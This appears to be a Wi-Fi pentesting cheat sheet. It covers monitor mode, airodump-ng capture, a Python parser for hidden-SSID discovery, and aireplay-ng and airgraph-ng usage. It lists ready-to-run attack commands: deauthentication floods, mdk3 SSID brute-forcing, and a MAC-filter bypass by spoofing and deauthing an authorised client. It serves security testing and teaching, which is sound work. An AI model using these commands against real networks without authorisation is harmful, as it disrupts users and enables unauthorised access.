🛜 WIFI
Terminology fundamentals

| Term | Definition |
|------|------------|
| SSID | Service Set Identifier. The Wi-Fi network name visible to users. |
| BSSID | Basic Service Set Identifier. The MAC address of the access point. |
| ESSID | Extended Service Set Identifier. Usually identical to the SSID; used for extended networks (roaming). |
| Beacon | Management frame sent periodically by the AP to announce its presence (SSID, BSSID, channel, security). |
| IV | Initialization Vector. Sent in cleartext with each encrypted packet and combined with the key to generate the keystream. Essential for WEP attacks. |

Interface Management

Check State

bash
iwconfig  # Show interfaces and status
iw list   # Show driver capabilities

Interface Configuration

bash
# Bring interface up/down
ip link set wlan0 up
ip link set wlan0 down

# Delete a virtual monitor interface
iw dev wlan0mon del

# Create a monitor interface manually
iw dev wlan0 interface add mon0 type monitor
bash
airmon-ng                 # List interfaces and chipsets
airmon-ng check           # Show interfering processes
airmon-ng check kill      # Kill NetworkManager, wpa_supplicant, etc.

airmon-ng start wlan0     # Create wlan0mon (monitor mode)
airmon-ng start wlan0 6   # Start on specific channel
airmon-ng stop wlan0mon   # Stop monitor mode
bash
# Test Injection
aireplay-ng -9 wlan0mon

⚡ TX Power

bash
# View current region and TX power limits
iw reg get

# Change region
iw reg set US

# Set TX power (interface must be down)
iwconfig wlan0 txpower 30

Scan

bash
iwlist wlan0 scan | grep -E 'Cell|Quality|ESSID|IEEE'

Channel & Frequency

bash
# List available channels
iwlist wlan0 channel

# Set channel (interface must be down)
iw dev wlan0mon set channel 6
iwconfig wlan0mon channel 11

# Set frequency
iwconfig wlan0 freq "5.52G"

# Show current frequency
iwlist wlan0 frequency | grep Current

airodump-ng

bash
airodump-ng $interface            # Start capture
airodump-ng -c 6,11 $interface    # Channels 6 and 11 only
airodump-ng --band a $interface   # a: 5 GHz
airodump-ng --band bg $interface  # b: 2.4 GHz (11 Mbps) | g: 2.4 GHz (54 Mbps)
airodump-ng -w capture $interface # Save to file (capture-01.cap, capture-01.csv, ...)

Hidden SSID Discovery

When airodump-ng shows the ESSID as <length: 0>, the SSID is hidden (not broadcast in beacons).

  • Passive method: wait for a client to connect; the association frames carry the SSID in cleartext:
bash
airodump-ng $interface -c $channel --bssid $bssid -w capture
  • Active method: deauth attack, forcing a client to reconnect:
bash
aireplay-ng -0 2 -a $bssid -c $client_mac $interface
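As an added example (not part of the original cheat sheet), a small Python parser for the CSV that `airodump-ng -w capture` writes: it flags access points whose beacons carry an empty or all-NUL ESSID (the ones airodump-ng shows as `<length: N>`) and lists the stations associated with each, which is exactly what the passive method waits to see. The sample CSV is constructed to follow airodump-ng's column layout; the MACs and network names are made up.

```python
import csv
import io

# Constructed sample in the column layout airodump-ng writes to capture-01.csv
# (AP section, blank line, station section). MACs and names are made up.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -40, 120, 0,   0.  0.  0.  0,   8, CorpWiFi,
66:77:88:99:AA:BB, 2024-01-01 10:00:01, 2024-01-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -55,  90, 0,   0.  0.  0.  0,   0, ,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
CC:DD:EE:FF:00:11, 2024-01-01 10:01:00, 2024-01-01 10:05:00, -50, 30, 66:77:88:99:AA:BB,
AA:BB:CC:DD:EE:FF, 2024-01-01 10:02:00, 2024-01-01 10:05:00, -60, 12, (not associated), CorpWiFi,Guest
"""

def parse_airodump_csv(text):
    """Return (aps, stations) from airodump-ng CSV text (CRLF and a leading blank line tolerated)."""
    ap_part, _, sta_part = text.replace("\r\n", "\n").strip().partition("\n\n")
    aps, stations = [], []
    for row in csv.reader(io.StringIO(ap_part)):
        row = [f.strip() for f in row]
        if len(row) < 14 or row[0] == "BSSID":      # skip header and blank rows
            continue
        aps.append({"bssid": row[0], "channel": int(row[3]), "privacy": row[5],
                    "id_length": int(row[12]), "essid": row[13]})
    for row in csv.reader(io.StringIO(sta_part)):
        row = [f.strip() for f in row]
        if len(row) < 6 or row[0] == "Station MAC":
            continue
        # Probed ESSIDs are written as extra comma-separated fields after the BSSID
        stations.append({"mac": row[0], "bssid": row[5], "probes": [p for p in row[6:] if p]})
    return aps, stations

def hidden_aps(aps):
    """APs whose ESSID is empty or all NUL bytes: airodump-ng displays these as <length: N>."""
    return [ap for ap in aps if ap["essid"].strip("\x00") == ""]

def clients_of(stations, bssid):
    """Station MACs associated with a BSSID (the STATION column for that AP)."""
    return [s["mac"] for s in stations if s["bssid"].lower() == bssid.lower()]

def hidden_ssid_report(text):
    """One line per hidden AP: channel, advertised ID length and associated clients."""
    aps, stations = parse_airodump_csv(text)
    return [f"{ap['bssid']} ch{ap['channel']} <length: {ap['id_length']}> "
            f"clients={clients_of(stations, ap['bssid'])}"
            for ap in hidden_aps(aps)]
```

On a real capture, call `hidden_ssid_report(open("capture-01.csv").read())`; each line names a hidden AP and the clients whose association frames will reveal its SSID.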

Brute-force SSID

bash
# Full brute-force (short SSIDs only)
mdk3 $interface p -b u -c 1 -t $bssid

# Wordlist attack
mdk3 $interface p -f /opt/wordlist.txt -t $bssid

# Character sets: u (uppercase), n (digits), a (all), c (mixed case), m (mixed+numbers)

MAC Filtering Bypass

  1. Identify an authorized client MAC from airodump-ng (STATION column)
  2. Spoof your MAC
bash
# Show current MAC address
macchanger $interface

# Set the spoofed MAC (interface must be down)
macchanger -m $authorized_mac $interface
  3. Deauth the legitimate client
bash
aireplay-ng -0 1 -a $bssid -c $authorized_mac $interface

Aircrack-ng Suite

bash
# Deauthentication (transverse attack)
aireplay-ng -0 <packets> -a $bssid -c $client_mac $interface
bash
# Generate graph from airodump-ng CSV
airgraph-ng -i capture-01.csv -g CAPR -o out.png

# Graph types:
# - CAPR: Client-to-AP Relationship
# - CPG: Common Probe Graph (clients grouped by the ESSIDs they probe for)